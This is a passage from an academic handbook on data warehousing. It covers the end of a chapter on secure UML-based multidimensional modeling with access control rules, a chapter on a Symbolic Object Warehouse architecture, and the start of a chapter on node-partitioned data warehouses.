• Enforcing the mandatory access control. The typical operations that final users can execute in this type of systems are query operations, so the mandatory access control has to be enforced for read operations. The access control rule for read operations is as follows: a user can access information only if (a) the security level of the user is greater than or equal to the security level of the information, (b) all the user compartments that have been defined for the information are owned by the user, and (c) at least one of the user roles that the information has defined is played by the user.
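A minimal sketch of this read-access check, assuming a numeric encoding of the security levels and plain sets for compartments and roles (with role-hierarchy ascendants already expanded into the user's role set), is shown below; the data structures and names are illustrative, not part of the proposal.

```python
LEVELS = {"U": 0, "C": 1, "S": 2, "TS": 3}   # Unclassified < Confidential < Secret < Top Secret

def can_read(user, obj):
    """Read-access check: the user's access class must dominate the object's
    class (level and compartments) and share at least one security role.
    user/obj are dicts with 'level', 'compartments', 'roles' (illustrative)."""
    level_ok = LEVELS[user["level"]] >= LEVELS[obj["level"]]
    compartments_ok = set(obj["compartments"]) <= set(user["compartments"])
    roles_ok = bool(set(obj["roles"]) & set(user["roles"]))  # ascendant roles pre-expanded
    return level_ok and compartments_ok and roles_ok

# Example: a Secret-level user playing the Health role can read an object
# classified Secret with roles {Health, Admin} and no compartments.
user = {"level": "S", "compartments": set(), "roles": {"Health"}}
obj = {"level": "S", "compartments": set(), "roles": {"Health", "Admin"}}
print(can_read(user, obj))   # True
```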
In this chapter, we will only focus on the second stage by defining a UML extension that allows us to classify the security elements in a conceptual MD model and to specify security constraints. According to Conallen (2000), an extension to the UML begins with a brief description and then lists and describes all the stereotypes, tagged values, and constraints of the extension. In addition to these elements, an extension contains a set of well-formedness rules. These rules are used
to determine whether a model is semantically consistent with itself. According to this quote, we define our UML extension for secure conceptual MD modeling following the schema composed of these elements:
• Description (a brief description of the extension in natural language),
• Prerequisite extensions (this element indicates whether the current extension needs the existence of previous extensions),
• Stereotypes / tagged values (the definition of the stereotypes and / or tagged values),
• Well-formedness rules (the static semantics of the metaclasses are defined both in natural language and as a set of invariants defined by means of OCL expressions), and
• Comments (any additional comment, decision or example, usually written in natural language).
Description (a brief description of the extension in natural language), Prerequisite extensions (this element indicates whether the current extension needs the existence of previous extensions), Stereotypes / tagged values (the definition of the stereotypes and / or tagged values), Well-formedness rules (the static semantics of the metaclasses are defined both in natural language and as a set of invariants defined by means of OCL expressions), and Comments (any additional comment, decision or example, usually written in natural language).
Figure 3. Example of MD model with security information and constraints
us to model all the rules of our ACA model. The MD model in Figure 3 includes a fact class (Admission), two dimensions (Diagnosis and Patient), two base classes (Diagnosis_group and City), and a class (UserProfile). The UserProfile class (stereotype UserProfile) contains the information of all users who will have access to this multidimensional model. The Admission fact class (stereotype Fact) contains all individual admissions of patients in one or more hospitals, and can be accessed by all users who have secret or top secret security levels (tagged value SecurityLevels (SL) of classes) and play health or administrative roles (tagged value SecurityRoles (SR) of classes). Note that the cost attribute can only be accessed by users who play the administrative role (tagged value SR of attributes). The Patient dimension contains the information of hospital patients, and can be accessed by all users who have the secret security level (tagged value SL) and play health or administrative roles (tagged value SR). The Address attribute can only be accessed by users who play the administrative role (tagged value SR of attributes). The City base class contains the information of cities, and it allows us to group patients by cities. Cities can be accessed by all users who have the confidential security level (tagged value SL). The Diagnosis dimension contains the information of each diagnosis, and can be accessed by users who play the health role (tagged value SR) and have the secret security level (tagged value SL). Finally, Diagnosis_group contains a set of general groups of diagnosis. Each group can be related to several diagnoses, but a diagnosis will always be related to a group. Diagnosis groups can be accessed by all users who have the confidential security level (tagged value SL). Several security constraints have been specified by using the previously defined constraints, stereotypes, and tagged values. Each security rule is first defined in natural language, then we specify the corresponding ACA rule, and finally we indicate where this rule is specified in the secure MD conceptual model. For example:
Rule 1: For each instance of the fact class Admission, the security level will be at least Secret, and the security roles will be Health and Admin.
ACA rule: OBJECTS MDCL Admission SECINF SL Secret SR Health Admin
Secure MD Model: See the Admission fact class and the tagged values SL and SR.
CONCLUSION
In this chapter, we have aligned our approach for the conceptual modeling of DWs with the MDA approach. Thus, as we have shown throughout the chapter, the secure conceptual modeling of the DW itself is accomplished by using a UML profile without considering any implementation aspect on a concrete target platform. Then, the resulting PIM can be transformed into any logical model representing the multidimensionality of data (e.g., the star schema), and finally this logical model can be transformed into a particular DBMS (e.g., Oracle). A relevant advantage of this approach is that it uses the UML, a widely accepted object-oriented modeling language, which saves developers from learning a new model and its corresponding notations for specific MD modeling. Furthermore, the UML allows us to represent some MD properties that are hardly considered by other conceptual MD proposals. Our work for the immediate future consists of developing an automated tool that allows us not only to model data warehouses in a secure way, using our profile, but also to translate and validate all the OCL sentences specified in the modeling. Furthermore, our proposal will be tested in a real environment in order to acquire empirical experience and to obtain results on its efficiency.
REFERENCES
Abelló, A., Samos, J., & Saltor, F. (2001). A framework for the classification and description of multidimensional data models. Proceedings of the 12th International Conference on Database and Expert Systems Applications (DEXA'01), Springer-Verlag LNCS 2113, Munich, Germany, pp. 668-677.
Basin, D., Doser, J., & Lodderstedt, T. (2003). Model driven security: From UML models to access control infrastructures. ETH Zürich.
Blaschka, M., Sapia, C., Höfling, G., & Dinter, B. (1998). Finding your way through multidimensional data models. Proceedings of the 9th International Conference on Database and Expert Systems Applications (DEXA'98). LNCS 1460, Springer-Verlag, Vienna, Austria, pp. 198-203.
Conallen, J. (2000). Building Web applications with UML. Addison-Wesley.
Fernández-Medina, E. & Piattini, M. (2003). Designing secure database for OLS. Database and expert systems applications: 14th international conference (DEXA 2003), Prague, Czech Republic, Springer-Verlag.
Ghosh, A., Howell, C., & Whittaker, J. (2002). Building software securely from the ground up. IEEE Software, 19(1), 14-16.
Gogolla, M. & Henderson-Sellers, B. (2002). Analysis of UML stereotypes within the UML metamodel. 5th International Conference on the Unified Modeling Language - The Language and its Applications, Dresden, Germany, Springer, LNCS.
Golfarelli, M., Maio, D., & Rizzi, S. (1998). Conceptual design of data warehouses from E/R schemes. 32nd Hawaii International Conference on Systems Sciences (HICSS 1998), Hawaii, USA, IEEE Computer Society.
Hall, A., & Chapman, R. (2002). Correctness by construction: Developing a commercial secure system. IEEE Software, 19(1), 18-25.
Jürjens, J. (2002). UMLsec: Extending UML for secure systems development. UML 2002 - The Unified Modeling Language, Model engineering, concepts and tools. Jézéquel, J., Hussmann, H. & Cook, S. (Eds.), Dresden, Germany, Springer: 412-425.
Kimball, R. & Ross, M. (2002). The data warehousing toolkit (2nd ed.). John Wiley.
Kleppe, A., Warmer, J. & Bast, W. (2003). MDA explained. The model driven architecture: Practice and promise. Addison-Wesley.
Lodderstedt, T., Basin, D. & Doser, J. (2002). SecureUML: A UML-based modeling language for model-driven security. 5th International Conference on the Unified Modeling Language (UML 2002), Dresden, Germany: Springer-Verlag.
Luján-Mora, S., Trujillo, J. & Song, I. Y. (2002). Extending the UML for multidimensional modeling. 5th International Conference on the Unified Modeling Language (UML 2002), Dresden, Germany: Springer-Verlag.
Marks, D., Sell, P., & Thuraisingham, B. (1996). MOMT: A multi-level object modeling technique for designing secure database applications. Journal of Object-Oriented Programming, 9(4), 22-29.
Priebe, T. & Pernul, G. (2001). A pragmatic approach to conceptual modeling of OLAP security. 20th International Conference on Conceptual Modeling (ER 2001). Yokohama, Japan: Springer-Verlag.
Sapia, C., Blaschka, M., Höfling, G., & Dinter, B. (1998). Extending the E/R model for the multidimensional paradigm. 1st International Workshop on Data Warehouse and Data Mining (DWDM'98). Singapore: Springer-Verlag.
Smith, G. W. (1991). Modeling security-relevant data semantics. IEEE Transactions on Software Engineering, 17(11), 1195-1203.
Trujillo, J., Palomar, M., Gómez, J., & Song, I. Y. (2001). Designing data warehouses with OO conceptual models. IEEE Computer, Special issue on Data Warehouses, (34), 66-75.
Tryfona, N., Busborg, F., & Christiansen, J. (1999). starER: A conceptual model for data warehouse design. ACM 2nd International Workshop on Data Warehousing and OLAP (DOLAP'99), Missouri, USA.
KEY TERMS
Access Control: Determines what one party will allow another one to do with respect to resources and objects mediated by the former. Access control models are typically composed of a set of authorization rules that regulate access to objects. Each authorization rule usually specifies the subject to which the rule applies, the object to which the authorization refers, the action to which the rule refers, and the sign describing whether the rule states a permission or a denial for the access.
Audit Process: Gathers data about activities in the system and analyzes it to discover security violations or diagnose their cause.
Data Warehouse (DW): A subject-oriented, integrated, time-variant, non-volatile collection of data in support of management's decision-making process.
Model Driven Architecture (MDA): An Object Management Group (OMG) standard that addresses the complete life cycle of designing, deploying, integrating, and managing applications.
Model Driven Security (MDS): A new approach for integrating security into information systems design. This approach considers design models and security models, which are combined, leading to a new kind of model called a security design model.
Multilevel Databases: Databases that contain objects with different levels of confidentiality and register subjects with different abilities.
Security: The capability of a software product to protect data and information so that unauthorized individuals or systems cannot read or modify them, while access is not denied to authorized staff.
UML Profile: A set of extensions to an existing UML diagram type for a different use. These extensions are specified by means of the extensibility mechanisms provided by UML (stereotypes, properties, and constraints) in order to adapt the diagram to a new method or model.
This work was previously published in Handbook of Research on Information Security and Assurance, edited by J.N.D. Gupta and S.K. Sharma, pp. 495-503, copyright 2009 by Information Science Reference (an imprint of IGI Global).
Chapter 2.13
Architecture for Symbolic Object Warehouse Sandra Elizabeth González Císaro Universidad Nacional del Centro de la Provincia de Buenos Aires, Argentina Héctor Oscar Nigro Universidad Nacional del Centro de la Provincia de Buenos Aires, Argentina
INTRODUCTION
Much of the information stored in current databases is not always present at the different levels of detail or granularity necessary for Decision-Making Processes (DMP). Some organizations have implemented a central database - a Data Warehouse (DW) - where information is used to perform analysis tasks. This depends on the maturity of the Information Systems (IS), the type of informational requirements or necessities, the organizational structure, and the business's own characteristics. A further important point is the intrinsic structure of complex data; nowadays it is very common to work with complex data, due to syntactic or semantic aspects and the type of processing involved (Darmont et al., 2006). Therefore, we must design systems that can handle data complexity to improve the DMP. OLAP systems solve the problem of presenting different aggregation levels and visualizations for
multidimensional data through the cube paradigm. The classical data analysis techniques (factorial analysis, regression, dispersion, etc.) are applied to individuals (tuples in transactional databases). The classic analysis objects are not expressive enough to represent tuples that contain distributions, logic rules, multivalued attributes, and intervals. They must also be able to respect internal variation and taxonomy, maintaining the dualism between individual and class. Consequently, we need a new data type holding these characteristics. This is precisely the mathematical concept model introduced by Diday, called the Symbolic Object (SO). SOs allow modeling of physical entities or real-world concepts. The former are the tuples stored in transactional databases and the latter are higher-level entities obtained from expert analysis, automatic classification, or some particular aggregation taken from analysis units (Bock & Diday, 2000).
The SO concept helps construct the DW and it is an important development for Data Mining (DM), in particular for the manipulation and analysis of aggregated information (Nigro & González Císaro, 2005). According to Calvanese, data integration is a central problem in the design of DWs and Decision Support Systems (Calvanese, 2003; Cali, et al., 2003); we therefore design the architecture for Symbolic Object Warehouse construction with an integrative goal. It also combines with Data Analysis tasks or DM. This paper is organized as follows: first, Background, where DW concepts are introduced; second, Main Focus, divided into SOs Basic Concepts, Constructing SOs, and Architecture; and third, Future Trends, Conclusions, References, and Key Terms.
Background
The classical definition given by the theme's pioneer is "a Data Warehouse is a subject-oriented, integrated, time-variant, and non-volatile collection of data in support of management's Decision-Making Process" (Inmon, 1996). The fundamental purpose of a DW is to empower the business staff with information that allows making decisions based on consolidated information. In essence, a DW is in a continuous process of transformation as regards information and business rules; both of them must be considered at design time to increase the robustness and flexibility of the system. Extraction, Transformation and Load (ETL) constitute the fundamental process in the DW. It is responsible for the extraction of data from several sources, their cleansing, customization, and insertion into the DW (Simitsis, et al., 2005). When complex data is involved, this process becomes difficult because of the integration of different semantics (especially with text data, sound, images, etc.) or complex structures. So, it is necessary to include integration functions able to join and merge them.
Metadata management, in DW construction, helps the user understand the stored contents. Information about the meaning of data elements and the availability of reports are indispensable to successfully use the DW. The generation and management of metadata serve two purposes (Staudt et al., 1999):
1. To minimize the efforts for development and administration of a DW
2. To improve the extraction from it.
Web Warehouse (WW) is a major topic widely researched and developed (Han & Kamber, 2001), as a result of the increasing and intensive use of e-commerce and e-business applications. WW tools and applications are morphing into enterprise portals, and analytical applications are being extended to transactional systems. In the same direction, the audiences for WW have expanded as analytical applications have rapidly moved (indirectly) into the transactional world of ERP, SCM, and CRM (King, 2000). Spatial data warehousing (SDW) responds to the need of providing users with a set of operations for easily exploring large amounts of spatial data, as well as for aggregating spatial data into synthetic information most suitable for decision-making (Damiani & Spaccapietra, 2006). Gorawski & Malczok (2004) present a distributed SDW system designed for storing and analyzing a wide range of spatial data. The SDW works with a new data model called the cascaded star model, which allows efficient storage and analysis of huge amounts of spatial data.
MAIN FOCUS
SOs Basic Concepts
Formally, an SO is a triple s = (a, R, d) where R is a relation between descriptions, d is a description, and "a" is a mapping defined from Ω (the discourse
universe) into L, depending on R and d (Diday, 2003). According to Gowda's definition: "SOs are extensions of classical data types and they are defined by a logical conjunction of events linking values and variables in which the variables can take one or more values, and all the SOs need not be defined on the same variables" (Gowda, 2004). We consider SOs a new data type for complex data, for which an algebra is defined in Symbolic Data Analysis. An SO models an individual or a class, maintaining its taxonomy and internal variation. In fact, we can represent a concept by its intentional description, i.e., the attributes necessary to characterize the studied phenomenon, and this description allows us to distinguish one concept from another. The key characteristics enumerated by Gowda (2004) that make an SO a complex data type are:
• All objects of a symbolic data set may not be defined on the same variables.
• Each variable may take more than one value or even an interval of values.
• In complex SOs, the values which the variables take may include one or more elementary objects.
• The description of an SO may depend on the existing relations between other objects.
• The descriptor values may have typicality values, which indicate frequency of occurrence, relative likelihood, level of importance of the values, and so on.
There are two main kinds of SOs (Diday & Billard, 2002):
• Boolean SOs: The instance of a binary relation between the descriptor of the object and the definition domain, which is defined to have values true or false. If [y(w) R d] ∈ {true, false}, s is a Boolean SO. Example: s = (pay-mode ∈ {good; regular}); here we are describing an individual/class of customers whose payment mode is good or regular.
• Modal SOs: In some situations we cannot say true or false; we have a degree of belonging, or some linguistic imprecision such as always true, often true, fifty-fifty, often false, always false; here we say that the relation is fuzzy. If [y(w) R d] ∈ L = [0, 1], s is a Modal SO. Example: s = (pay-mode ∈ [(0.25) good; (0.75) regular]); here we are describing an individual/class of customers whose payment mode is 0.25 good and 0.75 regular.
The SO extension is a function that helps recognize when an individual belongs to the class description or when a class fits into a more generic one. In the Boolean case, the extent of an SO is denoted Ext(s) and is defined by the extent of "a", which is: Extent(a) = {w ∈ Ω / a(w) = true}. In the Modal case, given a threshold α, it is defined by Extα(s) = Extentα(a) = {w ∈ Ω / a(w) ≥ α}. It is possible to work with SOs in two ways:
• Induction: We know the values of their attributes and determine to what class they belong.
• Generalization: We want to form a class through the generalization/specialization process of the values of the attributes of a set of individuals.
A considerable number of methods (Bock et al., 2000) have been developed to analyze SOs; they were implemented in the Sodas 1.2 and Sodas 2.5 software through the Sodas and Asso projects, respectively, whose aim is to analyze official data from Official Statistical Institutions (see the ASSO or SODAS home pages). The principal advantages of using SOs are (Bock & Diday, 2000; Diday, 2003):
• It preserves the confidentiality of the information.
• It supports the initial language in which the SOs were created.
• It allows the spread of concepts between databases.
• Being independent from the initial table, they are capable of identifying some individual coincidence described in another table.
As a result of working with higher-level units called concepts, necessarily described by more complex data, DM is extended to Knowledge Mining (Diday, 2004).
Constructing SOs
Now we are going to create SOs. Let us suppose we want to know the clients' profile grouped by work activity. How do we model this kind of situation with SOs? The SO descriptor must have the following attributes:
1. Continent
2. Age
3. Study Level
Suppose that in our operational databases we have stored the relational Tables 1 and 2.
Table 2. Taxonomy
Country - Continent
Spain - Europe
China - Asia
Australia - Oceania
Sudan - Africa
Argentina - America
India - Asia
France - Europe
Canada - America
Italy - Europe
Germany - Europe
EEUU - America
Notice that we take an SO for every value of the variable work activity. The SO descriptors are written in the same notation used in Bock and Diday's book:
SO-Agriculture (4) = [Study Level = {"low"(0.50), "medium"(0.50)}] ∧ [Continent = {"America"(0.5), "Europe"(0.25), "Oceania"(0.25)}] ∧ [Age = [30:42]].
SO-Manufactures (3) = [Study Level = {"low"(0.33), "medium"(0.33), "high"(0.33)}] ∧ [Continent = {"Asia"(0.33), "Europe"(0.66)}] ∧ [Age = [28:50]].
SO-Services (4) = [Study Level = {"medium"(0.25), "high"(0.75)}] ∧ [Continent = {"Africa"(0.25), "America"(0.25), "Asia"(0.25), "Europe"(0.25)}] ∧ [Age = [39:60]].
Now we have second-order units representing the work activity concept of our clients. The number in brackets is the quantity of individuals belonging to the SO, and the variables show the values for the class. For example, in SO-Manufactures the variable Study Level shows equal probability, the clients are distributed 33% in Asia and 66% in Europe, and the age is between 28 and 50 years. To plan the analysis units or SOs we need:
• Knowledge domain
• Rules of the business
• Type of information stored in the operational systems
• Organizational structures
We call these elements Background Knowledge.
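As an illustration of the generalization step just described (a sketch written for this running example, not code from the original projects; the field names are assumptions), SO descriptors such as SO-Agriculture can be derived by grouping client tuples on work activity and summarizing each attribute:
# Illustrative sketch: build one modal SO descriptor per work activity from
# client tuples (assumed fields: activity, study_level, country, age) and the
# country-to-continent taxonomy of Table 2.
from collections import Counter, defaultdict

def build_so_descriptors(clients, taxonomy):
    groups = defaultdict(list)
    for c in clients:
        groups[c["activity"]].append(c)
    descriptors = {}
    for activity, members in groups.items():
        n = len(members)
        study = Counter(c["study_level"] for c in members)
        continent = Counter(taxonomy[c["country"]] for c in members)
        ages = [c["age"] for c in members]
        descriptors[activity] = {
            "count": n,
            "Study Level": {value: round(count / n, 2) for value, count in study.items()},
            "Continent": {value: round(count / n, 2) for value, count in continent.items()},
            "Age": (min(ages), max(ages)),     # the interval [min:max]
        }
    return descriptors

taxonomy = {"Spain": "Europe", "Argentina": "America", "China": "Asia"}
clients = [{"activity": "Agriculture", "study_level": "low", "country": "Argentina", "age": 30},
           {"activity": "Agriculture", "study_level": "medium", "country": "Spain", "age": 42}]
print(build_so_descriptors(clients, taxonomy))
Each resulting entry mirrors the notation above: value distributions for the categorical variables and an interval for Age.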
Architecture
Figure 1 shows the information and knowledge flows and the most important tasks covered by this architecture (González Císaro, Nigro & Xodo, 2006). Generally, almost all current DW and DM solutions are based on decoupled architectures: DM tools suppose the data to be already selected, cleaned, and transformed. Solutions integrating these steps must be addressed. Figure 2 shows a conceptual architecture that identifies the most important modules of the system. A manager is associated with each of them so that they achieve flexibility (it is simple to add new functions), and the functionality encapsulation in every component helps the design organization and modularization. Thus, we can distinguish:
• System functionalities
• Which component carries out each task
• Information/knowledge workflows
Figure 1. Information & knowledge flow
Figure 2. Conceptual architecture
In the next paragraphs, a brief explanation of each component's functionality is given.
Intelligent Interface: It is responsible for the connection between the system and the user. We design this component with two Intelligent Discovery Assistants (Bernstein et al., 2005); one assists with DW tasks and the other with analysis or DM tasks.
ETL Manager: The user defines the SO descriptor and the system must obtain the data from operational databases and external sources. Two different types of loads are assumed:
• Initial: a predefined SO descriptor, which models the principal business concepts.
• Ad hoc: new SOs, which respond to new informational requirements.
The major subcomponents of the ETL Manager module are:
• ETL Scheduler
• Extraction & Load Engine
• Transformation & Clean Engine
Mining & Layout Manager: It is the analysis core. It shows SO descriptors and produces all types of graphics. In particular, the graphic subcomponent has to implement the Zoom Star graphic (Noirhomme, 2000, 2004), which is the best way to visualize SOs. The main subcomponents are:
• Mining Scheduler
• Method Engine
• Method DB
• Graphic Manager
• Exploration Manager
SO Store Manager: It stores the SOs and the SO metadata, performs concurrency control, audits, and provides safety. The component also logs, controls, assigns, and changes user roles. Metadata for SOs, as Vardaki (2004) affirms, should describe the symbolic variables, their nature, components, and domain. All the metadata necessary for symbolic data creation and processing can be presented as a metadata template or modeled in a separate metadata schema. The advantage of the modeling process is that it will indicate not only the metadata items considered, in a structured format, but will also specify their relations and the operators/transformations that can be applied for further manipulations. In this architecture, an independent schema to store metadata about SOs (the Metadata DB) was adopted. The SO Store Manager has four key subcomponents:
• SO & Metadata Scheduler
• SO Database
• Metadata DB
• Auditor
Future Trends
The next step is the formal specification of the architecture in terms of design. The problems to be resolved are:
• The construction of a language to manipulate SOs.
• How to store SOs, since efficiency in time and space is necessary.
Given the functional modularity, an object-oriented implementation would be the most suitable. Another implementation that would be very attractive is a multi-agent system. Potential progress in the algorithms that work on SOs will be guided by the techniques to be explored and developed. The most important and useful in DM are: association rules, regressions, cluster interpretability, and several types of neural networks.
CONCLUSION
An SO allows representing physical entities or real-world concepts in dual form, respecting their internal variations and structure. The SO Warehouse permits the intentional description of the most important concepts by means of the initial language the users make use of. Quality control, security, and accuracy of information are obtained in the SO creation process, since the meaning of null values is established in this process and the metadata are included (the latter are especially important in the DW and the DMP). One of the most valued advantages in the use of SOs is the capacity to carry out various levels of analysis, in which the output of one method
is the input of another. This can be observed in clustering or classification methods, as in most cases the output is a set of SOs. The principal disadvantages arising from the use of SOs are:
• The complexity of determining which will be the best SOs to represent the analysis tasks in the organization.
• When to update or change SOs.
As a result of the flexibility and modularity of its design, our architecture allows an integrated working environment, with possibilities for improvement and growth. As regards Symbolic Data Analysis, DW and DM integration is very important since it can be very practical to add the discovered knowledge into the DW. We may discover new potential client characteristics or relations; thus, SO descriptors in the DW can be updated, creating new SOs. Therefore, working with higher-level units like SOs could improve Knowledge Management and Decision-Making Processes.
REFERENCES
ASSO, Project Home Page. Retrieved May 2006, from http://www.info.fundp.ac.be/asso/.
Bernstein, A., Provost, F. & Hill, S. (2005). Towards intelligent assistance for a data mining process: An ontology-based approach for cost-sensitive classification. IEEE Transactions on Knowledge and Data Engineering, 17(4), pp. 503-518.
Bock, H. & Diday, E. (2000). Analysis of Symbolic Data. Studies in Classification, Data Analysis and Knowledge Organization. Heidelberg, Germany: Springer Verlag-Berlin.
Cali, A., Lembo, D., Lenzerini, M. & Rosati, R. (2003). Source integration for data warehousing. In Rafanelli, M. (Ed.), Multidimensional Databases: Problems and Solutions (pp. 361-392). Hershey, PA: Idea Group Publishing.
Calvanese, D. (2003). Data integration in data warehousing. Invited talk presented at the Decision Systems Engineering Workshop (DSE'03), Velden, Austria.
Damiani, M. & Spaccapietra, S. (2006). Spatial data in warehouse modeling. In Darmont, J. & Boussaid, O. (Eds.), Processing and Managing Complex Data for Decision Support (pp. 1-27). Hershey, PA: Idea Group Publishing.
Darmont, J. & Boussaid, O. (2006). Processing and Managing Complex Data for Decision Support. Hershey, PA: Idea Group Publishing.
Diday, E. & Billard, L. (2002). Symbolic Data Analysis: Definitions and examples. Retrieved March 27, 2006, from http://www.stat.uga.edu/faculty/LYNNE/tr_symbolic.pdf.
Diday, E. (2003). Concepts and Galois lattices in Symbolic Data Analysis. Journées de l'Informatique Messine, JIM'2003, Knowledge Discovery and Discrete Mathematics, Metz, France.
Diday, E. (2004). From Data Mining to Knowledge Mining: Symbolic Data Analysis and the Sodas software. Proceedings of the Workshop on Applications of Symbolic Data Analysis, Lisboa, Portugal. Retrieved January 25, 2006, from http://www.info.fundp.ac.be/asso/dissem/W-ASSOLisbon-Intro.pdf
González Císaro, S., Nigro, H. & Xodo, D. (2006, February). Arquitectura conceptual para Enriquecer la Gestión del Conocimiento basada en Objetos Simbólicos. In Feregrino Uribe, C., Cruz Enríquez, J. & Díaz Méndez, A. (Eds.), Proceedings of the V Ibero-American Symposium on Software Engineering (pp. 279-286), Puebla, Mexico.
Gowda, K. (2004). Symbolic objects and symbolic classification. Invited paper in Proceedings of the Workshop on Symbolic and Spatial Data Analysis: Mining Complex Data Structures, ECML/PKDD, Pisa, Italy.
Gorawski, M. & Malczok, R. (2003). Distributed spatial data warehouse. 5th International Conference on Parallel Processing and Applied Mathematics, Częstochowa, Springer Verlag, LNCS 3019.
Han, J. & Kamber, M. (2001). Data Mining: Concepts and Techniques. San Francisco: Morgan Kaufmann.
Inmon, W. (1996). Building the Data Warehouse (2nd edition). New York: John Wiley & Sons, Inc.
King, D. (2000). Web warehousing: Business as usual? In DM Review Magazine, May 2000 issue.
Nigro, H. & González Císaro, S. (2005). Symbolic Object and Symbolic Data Analysis. In Rivero, L., Doorn, J. & Ferraggine, V. (Eds.), Encyclopedia of Database Technologies and Applications (pp. 665-670). Hershey, PA: Idea Group Publishing.
Noirhomme, M. (2004, January). Visualization of Symbolic Data. Paper presented at the Workshop on Applications of Symbolic Data Analysis, Lisboa, Portugal.
Simitsis, A., Vassiliadis, P. & Sellis, T. (2005). Optimizing ETL processes in data warehouses. In Proceedings of the 21st IEEE International Conference on Data Engineering (pp. 564-575), Tokyo, Japan.
Sodas Home Page. Retrieved August 2006, from http://www.ceremade.dauphine.fr/~touati/sodaspagegarde.htm.
Staudt, M., Vaduva, A. & Vetterli, T. (1999). The role of metadata for data warehousing. Technical Report, Department of Informatics (IFI), University of Zurich, Switzerland.
Vardaki, M. (2004). Metadata for Symbolic Objects. JSDA Electronic Journal of Symbolic Data Analysis, 2(1). ISSN 1723-5081.
KEY TERMS
Cascaded Star Model: A model organized around a main fact table, whose main dimensions form smaller star schemas in which some dimension tables may become fact tables for other, nested star schemas.
Customer Relationship Management (CRM): A methodology used to learn more about customers' wishes and behaviors in order to develop stronger relationships with them.
Enterprise Resource Planning (ERP): A software application that integrates planning, manufacturing, distribution, shipping, and accounting functions into a single system, designed to serve the needs of each different department within the enterprise.
Intelligent Discovery Assistant: Helps data miners with the exploration of the space of valid DM processes. It takes advantage of an explicit ontology of data-mining techniques, which defines the various techniques and their properties (Bernstein et al., 2005, pp. 503-504).
Knowledge Management: An integrated, systematic approach to identifying, codifying, transferring, managing, and sharing all knowledge of an organization.
Supply Chain Management (SCM): The practice of coordinating the flow of goods, services, information and finances as they move from raw materials to parts supplier to manufacturer to wholesaler to retailer to consumer.
Symbolic Data Analysis: A relatively new field that provides a range of methods for analyzing complex datasets. It generalizes classical
methods of exploratory, statistical and graphical data analysis to the case of complex data. Symbolic data methods allow the user to build models of the data and make predictions about future events (Diday 2002).
Zoom Star: A graphical representation for SOs where each axis corresponds to a variable in a radial graph. It thus allows variables with intervals, multivalued values, weighted values, logical dependences, and taxonomies to be represented. 2D and 3D representations have been designed, allowing different types of analysis.
This work was previously published in Encyclopedia of Data Warehousing and Mining, Second Edition, edited by J. Wang, pp. 58-65, copyright 2009 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
Chapter 2.14
Efficient and Robust Node-Partitioned Data Warehouses Pedro Furtado Universidade de Coimbra, Portugal
ABSTRACT
Running large data warehouses (DWs) efficiently over low cost platforms places special requirements on the design of system architecture. The idea is to have the DW on a set of low-cost nodes in a nondedicated local area network (LAN). Nodes can run any relational database engine, and the system relies on a partitioning strategy and query processing middle layer. These characteristics are in contrast with typical parallel database systems, which rely on fast dedicated interconnects and hardware, as well as a specialized parallel query optimizer for a specific database engine. This chapter describes the architecture of the node-partitioned data warehouse (NPDW), designed to run on the low cost environment, focusing on the design for partitioning, efficient parallel join and query transformations. Given the low reliability of the target environment, we also show how replicas are incorporated in the design of a robust NPDW strategy with availability guarantees and how the replicas are used for always-on, always
efficient behavior in the presence of periodic load and maintenance tasks.
INTRODUCTION
Data warehouses (DWs) are specialized databases storing historical data pertaining to an organization. The objective is to allow business analysis on varied perspectives. They have been applied in many contexts, for instance, insurance companies keeping track of individual events on insurance policies, telecom companies with terabytes of data tracking individual phone calls or individual machine events in production factories, generating gigabytes of detailed data per day. The degree of detail over which the data is stored in the data warehouse can vary, but from the examples given, it is easy to see that data warehouses can become extremely large. As such, multiple performance optimization strategies can be sought after, ranging from specialized indexing, materialized views for faster computation over predicted
query patterns, to parallel architectures and parallel processing. Parallel database systems are implemented on one of the alternative parallel architectures: shared-memory, shared-disk, shared nothing, hierarchical, or NUMA (Valduriez & Ozsu, 1999), which have implications on parallel query processing algorithms, data partitioning, and placement. In practice, parallel environments involve several extra overheads related to data and control exchanges between processing units and also concerning storage, so that all components of the system need to be designed to avoid bottlenecks that would compromise the whole processing efficiency. Some parts of the system have to account for the aggregate flow into/from all units. For instance, in shared-disk systems the storage devices and interconnections should be sufficiently fast to handle the aggregate of all accesses without becoming a significant bottleneck. To handle these requirements, a significant initial and continuous investment is necessary in specialized, fast, and fully-dedicated hardware. An attractive alternative is to use a number of low-cost computer nodes in a shared-nothing environment, possibly in a nondedicated local network. The only requirement is that each node has some database engine and connectivity, while a middle layer provides parallel processing. This system must take into consideration partitioning and processing, as the computer nodes and interconnects are not specially designed to that end. The node-partitioned data warehouse (NPDW) is a generic architecture for partitioning and processing over the data warehouse in such an environment. The objective of this chapter is to discuss and analyze partitioning, processing, and availability issues in the design of the NPDW.
BACKGROUND
Typical data warehouse schemas have some distinctive properties: they are mostly read-only, with periodic loads. This characteristic minimizes
consistency issues which are a major concern regarding the parallelization of transactional schemas and workloads; data warehouse schemas usually have multidimensional characteristics (Kimball, Reeves, Ross, & Thornthwaite, 1998), with large central fact relations containing several measurements (e.g., the amount of sales) and a size of up to hundreds or thousands of gigabytes, and dimensions (e.g., shop, client, product, supplier). Each measurement is recorded for each individual combination of dimension values (e.g., sales of a product from a supplier, in one shop and for an individual client). While there are specific analysis-oriented data marts stored and analyzed using some nonrelational multidimensional engine (Kimball, Reeves, Ross, & Thornthwaite, 1998), our focus is on the large central repository warehouses stored in a relational engine; warehouses are used for online analytical processing (OLAP), including reporting and ad-hoc analysis patterns. OLAP involves complex query patterns, with joins involving multiple relations and aggregations. These query patterns can pose difficulties to the performance of shared-nothing partitioned environments, especially when nodes need to exchange massive quantities of data. While very small dimensions can be replicated into every node and kept in memory to speed up joins involving them, much more severe performance problems appear when many large relations need to be joined and processed to produce an answer. We use the schema and query set of the decision support performance benchmark TPC-H (TPC) as an example of such a complex schema and query workload and also as our experimental testbed. Performance and availability are relevant issues in data warehouses in general and pose specific challenges in the NPDW context (standard computer nodes and nonspecialized interconnects). Some research in recent years has focused on ad-hoc star join processing in data warehouses. Specialized structures such as materialized views (Rousopoulos, 1998) and specialized indexes (Chan & Ioannidis, 1998; O’Neil & Graefe, 1995)
